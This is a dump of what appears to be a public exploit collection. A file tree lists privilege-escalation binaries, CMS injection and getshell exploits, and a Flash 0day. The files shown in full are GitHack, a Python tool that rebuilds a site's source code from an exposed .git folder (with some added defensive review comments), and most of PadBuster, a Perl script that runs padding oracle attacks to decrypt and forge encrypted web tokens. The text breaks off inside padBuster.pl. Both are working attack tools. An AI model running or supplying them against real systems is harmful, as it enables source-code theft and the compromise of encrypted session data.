├── 32bit-win-8.1 ├── __MACOSX │ └── ._elevator.exe └── elevator.exe ├── 8.1 64 2012 exp └── 8.1 64 2012 exp.exe ├── GitHack-master ├── GitHack.py ├── README.md └── lib │ ├── __init__.py │ ├── __init__.pyc │ ├── parser.py │ └── parser.pyc ├── PadBuster-Padding Oracle Attack ├── README ├── padBuster.pl └── 参考.txt ├── README.md ├── Shopex ├── 4.8.4.htm ├── 4.8.5.htm └── exploit.htm ├── dede ├── Dede v5.7 feedback.php-12-10-31.html ├── buy_action.php ├── dede_5.7.php ├── dede_5.71.php ├── dedecms v55漏洞利用.htm └── dede注入导出.html ├── dz ├── discuz.php ├── discuz4.1.php ├── dz7-2getshell.py ├── faqgetshell.py └── uckeygetshell.php ├── ecshop ├── ECSHOP各版本注入通杀漏洞.htm ├── 全版本注入exp.html └── 要注册账号ECSHOP各版本注入通杀漏洞.html ├── fcgi_exp.zip ├── flash0day ├── calc.htm ├── exp1 │ ├── MyClass.as │ ├── MyClass1.as │ ├── MyClass2.as │ ├── MyUtils.as │ ├── ShellMac64.as │ ├── ShellWin32.as │ ├── ShellWin64.as │ ├── exp1.fla │ └── exp1.swf └── read me.txt ├── fuzzerpwd ├── FuzzerPwd.py ├── README.md ├── password.txt └── pwd.yx ├── jboss_exp ├── jboss_exploit_fat.jar ├── test.war └── 使用说明.txt ├── ms15-051(修改版) ├── ms15-051 │ ├── ms15-051.sln │ ├── ms15-051.suo │ └── ms15-051 │ │ ├── ReadMe.txt │ │ ├── Win32 │ │ └── ms15-051.exe │ │ ├── ms15-051.cpp │ │ ├── ms15-051.vcxproj │ │ ├── ms15-051.vcxproj.filters │ │ ├── ms15-051.vcxproj.user │ │ ├── ntdll.lib │ │ ├── ntdll64.lib │ │ └── x64 │ │ └── ms15-051.exe ├── ms15-051修正版.txt └── pic.png ├── php └── phpdos.py ├── phpcms ├── PHPCMS2008_comment_注入.php ├── PHPCMS_V9 AuthKey泄露导致注入EXP.php ├── PHPCMS_V9 authkey来getshell.php ├── PHPCMS中转脚本.php ├── Phpcms V9 Upfile%20 Exp.php ├── Phpcms V9 uc api SQL Exp.php └── php authkey加密构成.php ├── phpweb └── PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html ├── phpwind ├── PHPWIND_exp.php ├── phpwind 5.0.1 Sql注射漏洞利用程序.php └── phpwind5.x passport_client.php UPDATE SQL Injection POC.php ├── php包含和代码执行写一句话.txt ├── shellshock.txt ├── svn └── svn.php ├── urp └── urp_upload.html ├── 二分法查找.py ├── 免杀360cve20144113 ├── Win64.exe.lnk 
└── win32.exe ├── 延迟注入.py └── 盲注.py /32bit-win-8.1/__MACOSX/._elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/32bit-win-8.1/__MACOSX/._elevator.exe -------------------------------------------------------------------------------- /32bit-win-8.1/elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/32bit-win-8.1/elevator.exe -------------------------------------------------------------------------------- /8.1 64 2012 exp/8.1 64 2012 exp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/8.1 64 2012 exp/8.1 64 2012 exp.exe -------------------------------------------------------------------------------- /GitHack-master/GitHack.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Rebuilds a site's source tree from a web-exposed `.git/` directory (Python 2
# code: print statements, urllib2, Queue). It downloads `<url>/index`, parses it
# for (sha1, path) pairs, then fetches each blob from
# `<url>/objects/<2 hex>/<38 hex>`, zlib-inflates it, strips the `blob <len>\0`
# header and writes it under a folder named after the target host.
# Defensive takeaways: never deploy `.git/` (or other VCS metadata) under the
# web root and deny it at the server; in access logs the pattern is one GET for
# `/.git/index` followed by many `/.git/objects/..` GETs, issued here by up to
# 20 concurrent workers with one fixed iPhone User-Agent string.

import sys
import urllib2
import os
import urlparse
import zlib
import threading
import Queue
import re
import time
from lib.parser import parse


# Usage text when no URL was given; the target is always the last argument.
if len(sys.argv) == 1:
    msg = """

    A `.git` folder disclosure exploit. By LiJieJie

    Usage: GitHack.py http://www.target.com/.git/

    bug-report: my[at]lijiejie.com (http://www.lijiejie.com)
    """
    print msg
    sys.exit(0)


class Scanner(object):
    """Downloads and parses the index, then lets worker threads pull each blob.

    The base URL is sys.argv[-1]; output goes to a folder named after the
    URL's host (':' replaced by '_').
    """

    def __init__(self):
        self.base_url = sys.argv[-1]
        # Output folder: host[:port] of the target, with ':' made filesystem-safe
        self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_')
        if not os.path.exists(self.domain):
            os.mkdir(self.domain)
        print '[+] Download and parse index file ...'
        # NOTE(review): the usage example ends in '/', so this requests
        # '.../.git//index'; whether the target tolerates the doubled slash is
        # not checked here. The index is saved as 'index' in the current
        # directory (not under self.domain) and overwrites any existing file.
        data = self._request_data(sys.argv[-1] + '/index')
        with open('index', 'wb') as f:
            f.write(data)
        self.queue = Queue.Queue()
        # Only entries carrying a sha1 are queued; the first item parse()
        # yields is the index header, which has none.
        for entry in parse('index'):
            if "sha1" in entry.keys():
                self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
                print entry['name']
        self.lock = threading.Lock()
        self.thread_count = 20
        self.STOP_ME = False

    def _request_data(self, url):
        """GET *url* with the fixed User-Agent below and return the raw body.

        NOTE(review): urlopen is called without a timeout, so a stalled
        connection blocks the calling worker indefinitely.
        """
        request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})
        return urllib2.urlopen(request).read()

    def _print(self, msg):
        """Print *msg* under the shared lock so worker output does not interleave."""
        self.lock.acquire()
        print msg
        self.lock.release()

    def get_back_file(self):
        """Worker loop: fetch, inflate and write queued blobs until the queue drains.

        A 0.5 s queue timeout (caught by the bare except) is taken as "no more
        work". Each blob is attempted up to 3 times: a 404 is reported once and
        skipped, any other error is printed and retried. Packed objects
        (objects/pack/) are not handled, as the README notes. The live-worker
        counter is decremented when the loop ends.
        """
        while not self.STOP_ME:
            try:
                sha1, file_name = self.queue.get(timeout=0.5)
            except:
                break
            for i in range(3):
                try:
                    # Loose objects are stored as objects/<first 2 hex>/<remaining 38 hex>
                    folder = '/objects/%s/' % sha1[:2]
                    data = self._request_data(self.base_url + folder + sha1[2:])
                    data = zlib.decompress(data)
                    # Drop the loose-object header 'blob <size>\0' that precedes the content
                    data = re.sub('blob \d+\00', '', data)
                    # NOTE(review): file_name comes straight from the remote index and
                    # is joined unsanitized; an entry with '..' segments or an absolute
                    # path would make this write outside self.domain. Check that the
                    # resolved path stays under the output folder before writing.
                    target_dir = os.path.join(self.domain, os.path.dirname(file_name) )
                    if target_dir and not os.path.exists(target_dir):
                        os.makedirs(target_dir)
                    with open( os.path.join(self.domain, file_name) , 'wb') as f:
                        f.write(data)
                    self._print('[OK] %s' % file_name)
                    break
                except urllib2.HTTPError, e:
                    if str(e).find('HTTP Error 404') >=0:
                        self._print('[File not found] %s' % file_name)
                        break
                except Exception, e:
                    self._print('[Error] %s' % e)
        self.exit_thread()

    def exit_thread(self):
        """Decrement the live-worker counter under the lock; called when a worker returns."""
        self.lock.acquire()
        self.thread_count -= 1
        self.lock.release()

    def scan(self):
        """Start thread_count worker threads running get_back_file."""
        for i in range(self.thread_count):
            t = threading.Thread(target=self.get_back_file)
            t.start()


# Entry point: build the scanner (downloads and parses the index), start the
# workers and poll until they have all exited; Ctrl-C asks the workers to stop
# after the blob they are currently handling.
s = Scanner()
s.scan()
try:
    while s.thread_count > 0:
        time.sleep(0.1)
except KeyboardInterrupt, e:
    s.STOP_ME = True
    time.sleep(1.0)
    print 'User Aborted.'
-------------------------------------------------------------------------------- /GitHack-master/README.md: -------------------------------------------------------------------------------- 1 | GitHack 2 | = 3 | 4 | GitHack is a `.git` folder disclosure exploit. 5 | 6 | It rebuild source code from .git folder while keep directory structure unchanged. 7 | 8 | GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。 9 | 10 | 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 11 | 12 | ## 脚本的工作原理 ## 13 | 14 | * 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 15 | * 去.git/objects/ 文件夹下下载对应的文件 16 | * zlib解压文件,按原始的目录结构写入源代码 17 | 18 | ## 它的优点 ## 19 | 20 | * 速度快,默认20个工作线程 21 | * 尽量还原所有的源代码,缺失部分文件不影响脚本工作 22 | * 脚本不需要执行额外的git命令,All you need is python 23 | * 脚本无需浏览目录 24 | 25 | ## 可能的改进## 26 | 27 | * 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码 28 | 29 | ##用法示例## 30 | GitHack.py http://www.openssl.org/.git/ 31 | 32 | ##反馈## 33 | * my[at]lijiejie.com 34 | * [http://www.lijiejie.com](http://www.lijiejie.com) 35 | 36 | ##Thanks## 37 | Thanks for sbp's great work, I used his .git index parser [gin - a Git index file parser](https://github.com/sbp/gin) 38 | 39 | -------------------------------------------------------------------------------- /GitHack-master/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/__init__.py -------------------------------------------------------------------------------- /GitHack-master/lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/__init__.pyc -------------------------------------------------------------------------------- /GitHack-master/lib/parser.py: 
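--------------------------------------------------------------------------------
#!/usr/bin/env python
#
# https://github.com/git/git/blob/master/Documentation/technical/index-format.txt
#
# Reader for the binary `.git/index` file (versions 2 and 3). Runs on both
# Python 2 and 3: every comparison is done on bytes and no print statement is
# used. Malformed input raises ValueError instead of terminating the process.

import binascii
import collections
import mmap
import struct
import sys  # retained from the original module; no longer needed by this code


# Fixed-width part of every entry: ten 4-byte fields, the 20-byte SHA-1 and
# the 2-byte flags word.
_FIXED_ENTRY_LEN = 62


def check(boolean, message):
    """Raise ValueError(*message*) when *boolean* is false.

    The original printed the message and called sys.exit(1), which takes down
    any program embedding this parser; raising lets the caller decide.
    """
    if not boolean:
        raise ValueError(message)


def _read_number(f, fmt):
    """Read one unsigned number from *f* using struct format *fmt*.

    "All binary numbers are in network byte order", hence the "!" prefix.
    Raises ValueError when the data ends before the number is complete.
    """
    fmt = "!" + fmt
    size = struct.calcsize(fmt)
    data = f.read(size)
    check(len(data) == size, "Truncated index file")
    return struct.unpack(fmt, data)[0]


def _read_entry(f, version, number, pretty):
    """Read one index entry from *f* and return it as an OrderedDict.

    *version* is the header's index version (3 adds an extra flags word when
    the "extended" bit is set); *number* is the 1-based entry number;
    *pretty* collapses each time pair to float seconds and renders the mode
    as an octal string, as the original did. Raises ValueError on truncated
    data or non-NUL padding.
    """
    entry = collections.OrderedDict()
    entry["entry"] = number

    for stamp in ("ctime", "mtime"):
        seconds = _read_number(f, "I")
        nanoseconds = _read_number(f, "I")
        if pretty:
            # Float division on purpose: with integer division (Python 2) the
            # nanosecond part was always rounded away.
            entry[stamp] = seconds + nanoseconds / 1000000000.0
        else:
            entry[stamp + "_seconds"] = seconds
            entry[stamp + "_nanoseconds"] = nanoseconds

    entry["dev"] = _read_number(f, "I")
    entry["ino"] = _read_number(f, "I")

    # 4-bit object type, 3-bit unused, 9-bit unix permission
    mode = _read_number(f, "I")
    entry["mode"] = ("%06o" % mode) if pretty else mode

    entry["uid"] = _read_number(f, "I")
    entry["gid"] = _read_number(f, "I")
    entry["size"] = _read_number(f, "I")

    sha1 = f.read(20)
    check(len(sha1) == 20, "Truncated index file")
    entry["sha1"] = binascii.hexlify(sha1).decode("ascii")

    flags = _read_number(f, "H")
    entry["flags"] = flags
    # 1-bit assume-valid
    entry["assume-valid"] = bool(flags & 0x8000)
    # 1-bit extended, must be 0 in version 2
    entry["extended"] = bool(flags & 0x4000)
    # 2-bit stage, reported as the (high bit, low bit) pair of bools
    entry["stage"] = bool(flags & 0x2000), bool(flags & 0x1000)
    # 12-bit name length; saturates at 0xFFF for longer names
    namelen = flags & 0xFFF

    entrylen = _FIXED_ENTRY_LEN

    if entry["extended"] and version == 3:
        extra = _read_number(f, "H")
        entry["extra-flags"] = extra
        # 1-bit reserved
        entry["reserved"] = bool(extra & 0x8000)
        # 1-bit skip-worktree
        entry["skip-worktree"] = bool(extra & 0x4000)
        # 1-bit intent-to-add
        entry["intent-to-add"] = bool(extra & 0x2000)
        # the remaining 13 bits are unused
        entrylen += 2

    if namelen < 0xFFF:
        name = f.read(namelen)
        check(len(name) == namelen, "Truncated index file")
        entrylen += namelen
        # The NUL terminator is the first of the 1-8 padding bytes read below.
        padlen = (8 - (entrylen % 8)) or 8
    else:
        # Length field saturated: scan forward to the NUL terminator.
        parts = []
        while True:
            byte = f.read(1)
            check(byte != b"", "Truncated index file")
            if byte == b"\x00":
                break
            parts.append(byte)
        name = b"".join(parts)
        # Account for the name and its NUL (the original counted only the NUL,
        # which mis-aligned every entry after a name of 0xFFF+ bytes); the NUL
        # is already consumed, so the remaining padding may be empty.
        entrylen += len(name) + 1
        padlen = (8 - (entrylen % 8)) % 8
    entry["name"] = name.decode("utf-8", "replace")

    nuls = f.read(padlen)
    check(nuls == b"\x00" * padlen, "padding contained non-NUL")
    return entry


def parse(filename, pretty=True):
    """Yield the header and then every entry of the Git index file *filename*.

    The first item is the header OrderedDict (signature, version, entries);
    each further item is one entry as built by _read_entry. Only index
    versions 2 and 3 are supported, and nothing after the last entry
    (extensions, checksum) is read. Raises ValueError for a bad signature,
    an unsupported version, truncated data or non-NUL padding (mmap itself
    raises ValueError for an empty file). The mapping is released even when
    the generator is closed before it is exhausted.
    """
    with open(filename, "rb") as o:
        # mmap holds its own descriptor, so the file handle can close here
        # (the original relied on the same behaviour).
        f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)
    try:
        index = collections.OrderedDict()

        # 4-byte signature, b"DIRC"
        signature = f.read(4)
        check(signature == b"DIRC", "Not a Git index file")
        index["signature"] = signature.decode("ascii")

        # 4-byte version number
        index["version"] = _read_number(f, "I")
        check(index["version"] in (2, 3),
              "Unsupported version: %s" % index["version"])

        # 32-bit number of index entries
        index["entries"] = _read_number(f, "I")

        yield index

        for n in range(index["entries"]):
            yield _read_entry(f, index["version"], n + 1, pretty)
    finally:
        f.close()


-------------------------------------------------------------------------------- /GitHack-master/lib/parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/GitHack-master/lib/parser.pyc -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/README: -------------------------------------------------------------------------------- 1 | 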
PadBuster - Automated script for performing Padding Oracle attacks 2 | 3 | Author: Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) 4 | 5 | Credits to J.Rizzo and T.Duong for providing proof of concept web exploit 6 | techniques and S.Vaudenay for initial discovery of the attack. Credits also 7 | to James M. Martin (research@esptl.com) for sharing proof of concept exploit 8 | code for performing various brute force attack techniques. 9 | 10 | PadBuster is a Perl script for automating Padding Oracle Attacks. PadBuster 11 | provides the capability to decrypt arbitrary ciphertext, encrypt arbitrary plaintext, 12 | and perform automated response analysis to determine whether a request is vulnerable 13 | to padding oracle attacks. 14 | 15 | PadBuster is released under the Reciprocal Public License 1.5 (RPL1.5) 16 | http://www.opensource.org/licenses/rpl1.5 17 | -------------------------------------------------------------------------------- /PadBuster-Padding Oracle Attack/padBuster.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks 4 | # Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com) 5 | # 6 | # Credits to J.Rizzo and T.Duong for providing proof of concept web exploit 7 | # techniques and S.Vaudenay for initial discovery of the attack. Credits also 8 | # to James M. Martin (research@esptl.com) for sharing proof of concept exploit 9 | # code for performing various brute force attack techniques, and wireghoul (Eldar 10 | # Marcussen) for making code quality improvements. 
11 | # 12 | 13 | use LWP::UserAgent; 14 | use strict; 15 | use warnings; 16 | use Getopt::Std; 17 | use MIME::Base64; 18 | use URI::Escape; 19 | use Getopt::Long; 20 | use Time::HiRes qw( gettimeofday ); 21 | use Compress::Zlib; 22 | use Crypt::SSLeay; 23 | 24 | # Set defaults with $variable = value 25 | my $logFiles; 26 | my $post; 27 | my $encoding = 0; 28 | my $headers; 29 | my $cookie; 30 | my $error; 31 | my $prefix; 32 | my $intermediaryInput; 33 | my $cipherInput; 34 | my $plainTextInput; 35 | my $encodedPlainTextInput; 36 | my $noEncodeOption; 37 | my $superVerbose; 38 | my $proxy; 39 | my $proxyAuth; 40 | my $noIv; 41 | my $auth; 42 | my $resumeBlock; 43 | my $interactive = 0; 44 | my $bruteForce; 45 | my $ignoreContent; 46 | my $useBody; 47 | my $verbose; 48 | 49 | GetOptions( "log" => \$logFiles, 50 | "post=s" => \$post, 51 | "encoding=s" => \$encoding, 52 | "headers=s" => \$headers, 53 | "cookies=s" => \$cookie, 54 | "error=s" => \$error, 55 | "prefix=s" => \$prefix, 56 | "intermediate=s" => \$intermediaryInput, 57 | "ciphertext=s" => \$cipherInput, 58 | "plaintext=s" => \$plainTextInput, 59 | "encodedtext=s" => \$encodedPlainTextInput, 60 | "noencode" => \$noEncodeOption, 61 | "veryverbose" => \$superVerbose, 62 | "proxy=s" => \$proxy, 63 | "proxyauth=s" => \$proxyAuth, 64 | "noiv" => \$noIv, 65 | "auth=s" => \$auth, 66 | "resume=s" => \$resumeBlock, 67 | "interactive" => \$interactive, 68 | "bruteforce" => \$bruteForce, 69 | "ignorecontent" => \$ignoreContent, 70 | "usebody" => \$useBody, 71 | "verbose" => \$verbose); 72 | 73 | print "\n+-------------------------------------------+\n"; 74 | print "| PadBuster - v0.3.3 |\n"; 75 | print "| Brian Holyfield - Gotham Digital Science |\n"; 76 | print "| labs\@gdssecurity.com |\n"; 77 | print "+-------------------------------------------+\n"; 78 | 79 | if ($#ARGV < 2) { 80 | die " 81 | Use: padBuster.pl URL EncryptedSample BlockSize [options] 82 | 83 | Where: URL = The target URL (and query string if 
applicable) 84 | EncryptedSample = The encrypted value you want to test. Must 85 | also be present in the URL, PostData or a Cookie 86 | BlockSize = The block size being used by the algorithm 87 | 88 | Options: 89 | -auth [username:password]: HTTP Basic Authentication 90 | -bruteforce: Perform brute force against the first block 91 | -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded) 92 | -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2) 93 | -encoding [0-4]: Encoding Format of Sample (Default 0) 94 | 0=Base64, 1=Lower HEX, 2=Upper HEX 95 | 3=.NET UrlToken, 4=WebSafe Base64 96 | -encodedtext [Encoded String]: Data to Encrypt (Encoded) 97 | -error [Error String]: Padding Error Message 98 | -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2) 99 | -interactive: Prompt for confirmation on decrypted bytes 100 | -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded) 101 | -log: Generate log files (creates folder PadBuster.DDMMYY) 102 | -noencode: Do not URL-encode the payload (encoded by default) 103 | -noiv: Sample does not include IV (decrypt first block) 104 | -plaintext [String]: Plain-Text to Encrypt 105 | -post [Post Data]: HTTP Post Data String 106 | -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 107 | -proxy [address:port]: Use HTTP/S Proxy 108 | -proxyauth [username:password]: Proxy Authentication 109 | -resume [Block Number]: Resume at this block number 110 | -usebody: Use response body content for response analysis phase 111 | -verbose: Be Verbose 112 | -veryverbose: Be Very Verbose (Debug Only) 113 | 114 | ";} 115 | 116 | # Ok, if we've made it this far we are ready to begin.. 
117 | my $url = $ARGV[0]; 118 | my $sample = $ARGV[1]; 119 | my $blockSize = $ARGV[2]; 120 | 121 | if ($url eq "" || $sample eq "" || $blockSize eq "") { 122 | print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n"; 123 | exit(); 124 | } 125 | 126 | # Hard Coded Inputs 127 | #$post = ""; 128 | #$sample = ""; 129 | 130 | my $method = $post ? "POST" : "GET"; 131 | 132 | # These are file related variables 133 | my $dirName = "PadBuster." . &getTime("F"); 134 | my $dirSlash = "/"; 135 | my $dirCmd = "mkdir "; 136 | if (defined($ENV{'OS'})) { 137 | if ($ENV{OS} =~ /Windows/) { 138 | $dirSlash = "\\"; 139 | $dirCmd = "md "; 140 | } 141 | } 142 | my $dirExists = 0; 143 | my $printStats = 0; 144 | my $requestTracker = 0; 145 | my $timeTracker = 0; 146 | 147 | if ($encoding < 0 || $encoding > 4) { 148 | print "\nERROR: Encoding must be a value between 0 and 4\n"; 149 | exit(); 150 | } 151 | my $encodingFormat = $encoding ? $encoding : 0; 152 | 153 | my $encryptedBytes = $sample; 154 | my $totalRequests = 0; 155 | 156 | # See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem) 157 | if ($sample =~ /\%/) { 158 | $encryptedBytes = &uri_unescape($encryptedBytes) 159 | } 160 | 161 | # Prep the sample for regex use 162 | $sample = quotemeta $sample; 163 | 164 | # Now decode 165 | $encryptedBytes = &myDecode($encryptedBytes, $encodingFormat); 166 | if ( (length($encryptedBytes) % $blockSize) > 0) { 167 | print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n"; 168 | print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n"; 169 | exit(); 170 | } 171 | 172 | # If no IV, then append nulls as the IV (only if decrypting) 173 | if ($noIv && !$bruteForce && !$plainTextInput) { 174 | $encryptedBytes = "\x00" x $blockSize . 
$encryptedBytes; 175 | } 176 | 177 | # PlainTextBytes is where the complete decrypted sample will be stored (decrypt only) 178 | my $plainTextBytes; 179 | 180 | # This is a bool to make sure we know where to replace the sample string 181 | my $wasSampleFound = 0; 182 | 183 | # ForgedBytes is where the complete forged sample will be stored (encrypt only) 184 | my $forgedBytes; 185 | 186 | # Isolate the IV into a separate byte array 187 | my $ivBytes = substr($encryptedBytes, 0, $blockSize); 188 | 189 | # Declare some optional elements for storing the results of the first test iteration 190 | # to help the user if they don't know what the padding error looks like 191 | my @oracleCantidates; 192 | my $oracleSignature = ""; 193 | my %oracleGuesses; 194 | my %responseFileBuffer; 195 | 196 | # The block count should be the sample divided by the blocksize 197 | my $blockCount = int(length($encryptedBytes)) / int($blockSize); 198 | 199 | if (!$bruteForce && !$plainTextInput && $blockCount < 2) { 200 | print "\nERROR: There is only one block. 
Try again using the -noiv option.\n"; 201 | exit(); 202 | } 203 | 204 | # The attack works by sending in a real cipher text block along with a fake block in front of it 205 | # You only ever need to send two blocks at a time (one real one fake) and just work through 206 | # the sample one block at a time 207 | 208 | 209 | # First, re-issue the original request to let the user know if something is potentially broken 210 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie); 211 | 212 | &myPrint("\nINFO: The original request returned the following",0); 213 | &myPrint("[+] Status: $status",0); 214 | &myPrint("[+] Location: $location",0); 215 | &myPrint("[+] Content Length: $contentLength\n",0); 216 | &myPrint("[+] Response: $content\n",1); 217 | 218 | $plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput; 219 | 220 | if ($bruteForce) { 221 | &myPrint("INFO: Starting PadBuster Brute Force Mode",0); 222 | my $bfAttempts = 0; 223 | 224 | print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock; 225 | 226 | # Only loop through the first 3 bytes...this should be enough as it 227 | # requires 16.5M+ requests 228 | 229 | my @bfSamples; 230 | my $sampleString = "\x00" x 2; 231 | for my $c (0 ... 255) { 232 | substr($sampleString, 0, 1, chr($c)); 233 | for my $d (0 ... 255) { 234 | substr($sampleString, 1, 1, chr($d)); 235 | push (@bfSamples, $sampleString); 236 | } 237 | } 238 | 239 | foreach my $testVal (@bfSamples) { 240 | my $complete = 0; 241 | while ($complete == 0) { 242 | my $repeat = 0; 243 | for my $b (0 ... 
255) { 244 | $bfAttempts++; 245 | if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) { 246 | #SKIP 247 | } else { 248 | my $testBytes = chr($b).$testVal; 249 | $testBytes .= "\x00" x ($blockSize-3); 250 | 251 | my $combinedBf = $testBytes; 252 | $combinedBf .= $encryptedBytes; 253 | $combinedBf = &myEncode($combinedBf, $encoding); 254 | 255 | # Add the Query String to the URL 256 | my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf); 257 | 258 | 259 | # Issue the request 260 | my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies); 261 | 262 | my $signatureData = "$status\t$contentLength\t$location"; 263 | $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody; 264 | 265 | if ($oracleSignature eq "") { 266 | &myPrint("[+] Starting response analysis...\n",0) if ($b ==0); 267 | $oracleGuesses{$signatureData}++; 268 | $responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"; 269 | if ($b == 255) { 270 | &myPrint("*** Response Analysis Complete ***\n",0); 271 | &determineSignature(); 272 | $printStats = 1; 273 | $timeTracker = 0; 274 | $requestTracker = 0; 275 | $repeat = 1; 276 | $bfAttempts = 0; 277 | } 278 | } 279 | if ($oracleSignature ne "" && $oracleSignature ne $signatureData) { 280 | &myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0); 281 | &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content"); 282 | } 283 | } 284 | } 285 | ($repeat == 1) ? 
($complete = 0) : ($complete = 1); 286 | } 287 | } 288 | } elsif ($plainTextInput) { 289 | # ENCRYPT MODE 290 | &myPrint("INFO: Starting PadBuster Encrypt Mode",0); 291 | 292 | # The block count will be the plaintext divided by blocksize (rounded up) 293 | my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99); 294 | &myPrint("[+] Number of Blocks: ".$blockCount."\n",0); 295 | 296 | my $padCount = ($blockSize * $blockCount) - length($plainTextInput); 297 | $plainTextInput.= chr($padCount) x $padCount; 298 | 299 | # SampleBytes is the encrypted text you want to derive intermediate values for, so 300 | # copy the current ciphertext block into sampleBytes 301 | # Note, nulls are used if not provided and the intermediate values are brute forced 302 | 303 | $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize; 304 | my $sampleBytes = $forgedBytes; 305 | 306 | for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) { 307 | # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored 308 | my $intermediaryBytes; 309 | 310 | if ($intermediaryInput && $blockNum == $blockCount) { 311 | $intermediaryBytes = &myDecode($intermediaryInput,2); 312 | } else { 313 | $intermediaryBytes = &processBlock($sampleBytes); 314 | } 315 | 316 | # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block 317 | # This will become the next ciphertext block (or IV if the last one) 318 | $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize); 319 | $forgedBytes = $sampleBytes.$forgedBytes; 320 | 321 | &myPrint("\nBlock ".($blockNum)." 
Results:",0); 322 | &myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0); 323 | &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0); 324 | 325 | } 326 | $forgedBytes = &myEncode($forgedBytes, $encoding); 327 | chomp($forgedBytes); 328 | } else { 329 | # DECRYPT MODE 330 | &myPrint("INFO: Starting PadBuster Decrypt Mode",0); 331 | 332 | if ($resumeBlock) { 333 | &myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0); 334 | } else { 335 | $resumeBlock = 1 336 | } 337 | 338 | # Assume that the IV is included in our sample and that the first block is the IV 339 | for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) { 340 | # Since the IV is the first block, our block count is artificially inflated by one 341 | &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0); 342 | 343 | # SampleBytes is the encrypted text you want to break, so 344 | # lets copy the current ciphertext block into sampleBytes 345 | my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize); 346 | 347 | # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored 348 | my $intermediaryBytes = &processBlock($sampleBytes); 349 | 350 | # DecryptedBytes is where the decrypted block is stored 351 | my $decryptedBytes; 352 | 353 | # Now we XOR the decrypted byte with the corresponding byte from the previous block 354 | # (or IV if we are in the first block) to get the actual plain-text 355 | $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize); 356 | 357 | &myPrint("\nBlock ".($blockNum-1)." 
